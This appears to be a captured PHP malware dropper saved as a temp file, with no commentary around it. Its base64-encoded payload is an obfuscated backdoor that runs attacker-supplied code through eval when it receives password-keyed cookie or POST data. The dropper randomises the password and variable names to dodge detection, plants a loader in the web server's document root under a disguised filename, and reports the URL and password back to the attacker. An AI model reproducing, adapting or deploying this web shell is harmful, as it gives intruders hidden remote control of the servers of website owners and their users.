Filename: ///tmp/ar8st_1693333622

<?php if(!defined("PHP_EOL")) { define("PHP_EOL", "\n"); } if(!defined("DIRECTORY_SEPARATOR")) { define("DIRECTORY_SEPARATOR", "/"); } function generateRandomStringEval($length = 12) { $characters = 'AQZSXWCDEVFRBGTHYNMUJabcdefghijklmnopqrstuvwxyz'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString ; } function generateRndString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString ; } function generateRandomString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyz'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString . ".php"; } function _add_action($snippet, $template, $xor_number) { $splitted = str_split($snippet); $action = ""; for ($i = 0; $i < strlen($snippet);$i++) { $action .= $splitted[$i] ^ $template[$i%$xor_number]; } $action = urlencode($action); return $action; } function GetDocRoot() { $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']); if ($docroot_end === FALSE) { return $_SERVER['DOCUMENT_ROOT']; } elseif ($docroot_end === 0) { return "/"; } else { return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end); } } $origin_backdoor = base64_decode("PD9waHANCkBpbmlfc2V0KCdlcnJvcl9sb2cnLCBOVUxMKTsNCkBpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQoNCg0KZnVuY3Rpb24gc2hkcCgkZGF0YSwgJGtleSkNCnsNCiAgICAkb3V0X2RhdGEgPSAiIjsNCiAgICBmb3IgKCRpID0gMDsgJGkgPCBzdHJsZW4oJGRhdGEpOykgew0KICAgICAgICBmb3IgKCRqID0gMDsgJGogPCBzdHJsZW4oJGtleSkgJiYgJGkgPCBzdHJsZW4oJGRhdGEpOyAkaisrLCAkaSsrKSB7DQogICAgICAgICAgICAkb3V0X2RhdGEgLj0gY2hyKG9yZCgkZGF0YVskaV0pIF4gb3JkKCRrZXlbJGpdKSk7DQogICAgICAgIH0NCiAgICB9DQogICAgcmV0dXJuICRvdXRfZGF0YTsNCn0NCmlmIChpc3NldCgkX0dFVFs2NzM0MzVdKSkNCnsNCiAgICBkaWUobWQ1KDQ3NzEyKSk7DQp9DQokdGVtcD1hcnJheV9tZXJnZSgkX0NPT0tJRSwgJF9QT1NUKTsNCmZvcmVhY2ggKCR0ZW1wIGFzICRkYXRhX2tleSA9PiAkZGF0YSkgew0KICAgICRkYXRhID0gQHVuc2VyaWFsaXplKHNoZHAoc2hkcChiYXNlNjRfZGVjb2RlKCRkYXRhKSwgJzRlZjYzYWJlLTFhYmQtNDVhNi05MTNkLTZmYjk5NjU3ZTI0YicpLCAkZGF0YV9rZXkpKTsNCiAgICBpZiAoaXNzZXQoJGRhdGFbJ2FrJ10pKSB7DQogICAgICAgIGlmICgkZGF0YVsnYSddID09ICdpJykgew0KICAgICAgICAgICAgJGkgPSBhcnJheSgNCiAgICAgICAgICAgICAgICAncHYnID0+IEBwaHB2ZXJzaW9uKCksDQogICAgICAgICAgICAgICAgJ3N2JyA9PiAnMS4wLTEnLA0KICAgICAgICAgICAgKTsNCiAgICAgICAgICAgIGVjaG8gQHNlcmlhbGl6ZSgkaSk7DQogICAgICAgIH0gZWxzZWlmICgkZGF0YVsnYSddID09ICdlJykgew0KICAgICAgICAgICAgZXZhbCgkZGF0YVsnZCddKTsNCiAgICAgICAgfQ0KICAgICAgICBleGl0KCk7DQogICAgfQ0KfQ=="); $new_pass = generateRndString(35); $origin_backdoor = str_replace("4ef63abe-1abd-45a6-913d-6fb99657e24b",$new_pass,$origin_backdoor ); $evaluaor = base64_decode("PD9waHANCg0KZnVuY3Rpb24gX3JlbW92ZV9hY3Rpb24oJHNuaXBwZXQsICR0ZW1wbGF0ZSkNCnsNCiAgICAkc25pcHBldCA9IHVybGRlY29kZSgkc25pcHBldCk7DQogICAgJHNwbGl0dGVkID0gc3RyX3NwbGl0KCRzbmlwcGV0KTsNCiAgICAkYWN0aW9uID0gIiI7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgc3RybGVuKCRzbmlwcGV0KTskaSsrKSB7DQogICAgICAgICRhY3Rpb24gLj0gJHNwbGl0dGVkWyRpXSBeICR0ZW1wbGF0ZVskaSV4b3JfbnVtYmVyXTsNCiAgICB9DQogICAgcmV0dXJuICRhY3Rpb247DQp9DQoNCiRpPSIjVVJMRU5DT0RFRF9DT0RFIyI7DQokaj0iI1VSTEVOQ09ERURfZmlsZV9wdXRfY29udGV0bnRzIyI7DQoNCiRpbmRleD0iI1hPUktFWSMiOw0KDQokayA9IF9yZW1vdmVfYWN0aW9uKCRpLCAkaW5kZXgpOw0KJGYgPSBfcmVtb3ZlX2FjdGlvbigkaiwgJGluZGV4KTsNCiRmKCRpbmRleCwgJGspOw0KaW5jbHVkZV9vbmNlICgkaW5kZXgpOw0KdW5saW5rKCRpbmRleCk7DQpleGl0KCk7"); $xor_number=rand(3,12); $XORKEY = generateRandomStringEval(12); $URLENCODED_CODE = _add_action($origin_backdoor, $XORKEY, $xor_number); $URLENCODED_CODE_file_put_contents = _add_action("file_put_contents", $XORKEY, $xor_number); $snippet_varname = generateRandomStringEval(rand(6,12)); $template_varname = generateRandomStringEval(rand(6,12)); $splitted_varname = generateRandomStringEval(rand(6,12)); $_remove_action_varname = generateRandomStringEval(rand(6,12)); $index_varname = generateRandomStringEval(rand(6,12)); $evaluaor=str_replace('$splitted', "$".$splitted_varname, $evaluaor); $evaluaor=str_replace('xor_number', $xor_number, $evaluaor); $evaluaor=str_replace('$index', "$".$index_varname, $evaluaor); $evaluaor=str_replace('#XORKEY#', $XORKEY, $evaluaor); $evaluaor=str_replace('_remove_action', $_remove_action_varname, $evaluaor); $evaluaor=str_replace('$template', "$".$template_varname, $evaluaor); $evaluaor=str_replace('$snippet', "$".$snippet_varname, $evaluaor); $evaluaor=str_replace('#URLENCODED_CODE#', $URLENCODED_CODE, $evaluaor); $payload_file=str_replace('#URLENCODED_file_put_contetnts#', $URLENCODED_CODE_file_put_contents, $evaluaor); srand(time()); if (!function_exists('file_put_contents')) { function file_put_contents($filename, $data) { $f = @fopen($filename, 'w'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes; } } } //////////////////////////////////////////////////////////////////////////////////////////// $filename = "readurl.php"; # $filename = generateRandomString(); #$filename = "options-reading.php"; #$filename = "wp-login.php"; $filename = "8w0eizsa.php"; # get base local and remote path $base_www_path = $host = @$_SERVER['HTTP_HOST']; $base_local_path = GetDocRoot(); $full_payload_name = GetDocRoot() . "/$filename"; $good = FALSE; if (file_put_contents($full_payload_name, $payload_file)) { echo "UROK#http://" . $filename. "#ONDOK#". $new_pass . "#ENDP" . PHP_EOL; $good=TRUE; $good_counter++; exit(); } if(!$good) echo "URL#STATUS_CANTUPLOAD#CCCURL"; echo "#CCCURL"; //unlink("dfaonfpfkwg.php"); exit();

./Ninja\.